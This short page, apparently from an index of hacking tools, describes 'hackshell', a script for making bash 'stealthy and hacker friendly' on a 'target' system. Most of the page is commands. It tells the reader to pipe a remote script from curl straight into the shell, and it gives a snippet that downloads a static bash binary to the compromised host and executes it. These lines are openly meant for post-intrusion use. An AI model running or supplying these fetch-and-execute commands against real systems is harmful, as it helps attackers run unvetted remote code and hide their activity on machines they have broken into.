Home

Awesome

hackshell

Make BASH stealthy and hacker friendly with lots of bash functions

Usage:

 source <(curl -SsfL https://thc.org/hs)
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Some features:

hackshell

It works best with bash. Download BASH if there is no bash on your target:

URL="https://bin.ajam.dev/$(uname -m)/bash"
[ "$(uname -m)" == i686 ] && URL='https://github.com/polaco1782/linux-static-binaries/raw/refs/heads/master/x86-i686/bash'
curl -obash -SsfL "${URL}" && chmod 700 bash && ./bash --version && exec ./bash -il